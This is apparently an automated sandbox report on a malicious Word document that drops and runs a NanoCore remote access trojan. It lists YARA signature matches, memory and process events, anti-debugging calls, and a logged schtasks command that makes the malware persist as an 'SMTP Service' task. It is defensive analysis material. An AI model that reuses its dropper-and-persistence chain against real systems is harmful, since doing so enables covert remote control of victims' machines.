        Source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: JNM.exe PID: 1692, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: JNM.exe PID: 1692, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: JNM.exe PID: 2304, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: JNM.exe PID: 2304, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: JNM.exe PID: 2360, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: JNM.exe PID: 2360, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 7.2.JNM.exe.620000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 7.2.JNM.exe.630000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 7.2.JNM.exe.630000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Office equation editor drops PE fileShow sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\JNM.exeJump to dropped file
        Source: C:\Users\user\AppData\Roaming\JNM.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\JNM.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\JNM.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\JNM.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\JNM.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\JNM.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\JNM.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\JNM.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 3_2_00400AC4 NtSetInformationThread,
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 3_2_00408E03 NtSetInformationThread,
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 15_2_00450AC4 NtSetInformationThread,
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 15_2_00458DE5 NtSetInformationThread,
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 16_2_003B0AC4 NtSetInformationThread,
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 16_2_003B8E03 NtSetInformationThread,
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 3_2_00404BE8
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 3_2_00404881
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 7_2_0044E038
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 7_2_0044C0B0
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 7_2_004443A0
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 7_2_0044B498
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 7_2_00443788
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 7_2_0044C16E
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 7_2_0044C129
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 7_2_00444458
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 15_2_00454BE8
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 15_2_00454BDA
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 16_2_003B4BE8
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 16_2_003B4BDA
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 23_2_002143A0
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 23_2_00213788
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 23_2_00214C78
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 23_2_00214458
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 26_2_003F43A0
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 26_2_003F3788
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 26_2_003F4458
        Source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000007.00000002.2356337271.0000000000620000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000007.00000002.2356337271.0000000000620000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: JNM.exe PID: 1692, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: JNM.exe PID: 1692, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: JNM.exe PID: 2304, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: JNM.exe PID: 2304, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: JNM.exe PID: 2360, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: JNM.exe PID: 2360, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 7.2.JNM.exe.620000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.2.JNM.exe.620000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 7.2.JNM.exe.630000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.2.JNM.exe.630000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 7.2.JNM.exe.630000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.2.JNM.exe.630000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: JNM.exe, 00000003.00000002.2356181917.00000000004D6000.00000004.00000020.sdmpBinary or memory string: Pinaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
        Source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmpBinary or memory string: 8inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
        Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@32/13@16/2
        Source: C:\Users\user\AppData\Roaming\JNM.exeFile created: C:\Program Files (x86)\SMTP ServiceJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$atement.docJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{9a83c6a0-5b64-416c-b0dc-d47048e32edf}
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD27B.tmpJump to behavior
        Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ......................$...........W.a.i.t.i.n.g. .f.o.r. .1.....H........e......................0...............(.........................$.....
        Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .............(.......J.................$.....
        Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.....d.......,.......H........e......................e. .............(..........................s....
        Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.....d.......,.......H.......#e......................e. .............(..........................s....
        Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................0.%...............%.....(.P.....$........................j......................................................................
        Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................@.'...............'.....(.P.............|................l......................................................................
        Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................X.............W.a.i.t.i.n.g. .f.o.r. .1..............p......................0.................%.............................
        Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. ...............%.....J.......................
        Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P..............................q......................e. ...............%.......................7s....
        Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.............................&q......................e. ...............%.......................7s....
        Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................@.............W.a.i.t.i.n.g. .f.o.r. .1..............r......................0.................#.............................
        Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. ...............#.....J.......................
        Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.............l...............!s......................e. ...............#.......................1s....
        Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.............l.......@.......Gs......................e. ...............#.......................1s....
        Source: C:\Users\user\AppData\Roaming\JNM.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Roaming\JNM.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Roaming\JNM.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Roaming\JNM.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: Statement.docVirustotal: Detection: 45%
        Source: Statement.docReversingLabs: Detection: 58%
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe
        Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp'
